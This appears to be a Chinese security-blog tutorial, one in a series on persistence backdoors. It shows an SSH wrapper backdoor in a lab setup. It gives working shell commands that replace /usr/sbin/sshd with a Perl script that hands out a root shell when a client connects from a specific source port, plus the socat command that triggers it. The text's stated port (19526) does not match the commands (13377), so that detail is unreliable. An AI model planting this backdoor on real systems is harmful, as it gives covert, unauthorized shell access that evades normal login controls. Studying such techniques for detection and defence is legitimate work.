系列文章

操作系统权限维持（一）之Windows系统-粘贴键后门
操作系统权限维持（二）之Windows系统-克隆账号维持后门
操作系统权限维持（三）之Windows系统-启动项维持后门
操作系统权限维持（四）之Windows系统-计划任务维持后门
操作系统权限维持（五）之Windows系统-系统服务维持后门
操作系统权限维持（六）之Linux系统-定时任务后门
操作系统权限维持（七）之Linux系统-SUID后门
操作系统权限维持（八）之Linux系统-SSHKey后门
操作系统权限维持（九）之Linux系统-添加用户后门
操作系统权限维持（十）之Linux系统-SSH 软连接后门

SSH Wrapper后门

首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候，正则匹配会失败，于是执行下一句，启动/usr/bin/sshd，这是原始sshd。原始的sshd监听端口建立了tcp连接后，会fork一个子进程处理具体工作。这个子进程，没有什么检验，而是直接执行系统默认的位置的/usr/sbin/sshd，这样子控制权又回到脚本了。此时子进程标准输入输出已被重定向到套接字，getpeername能真的获取到客户端的TCP源端口，如果是19526就执行sh给个shell.

简单点就是从sshd fork出一个子进程，输入输出重定向到套接字，并对连过来的客户端端口进行了判断

实验环境

机器名	IP	位置
kali	192.168.52.130	客户端
kali-2	192.168.52.132	服务端

服务端执行：

cd /usr/sbin/
mv sshd ../bin/    #对sshd程序做备份
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
/etc/init.d/ssh restart

客户端执行：

socat STDIO TCP4:192.168.52.132:22,sourceport=13377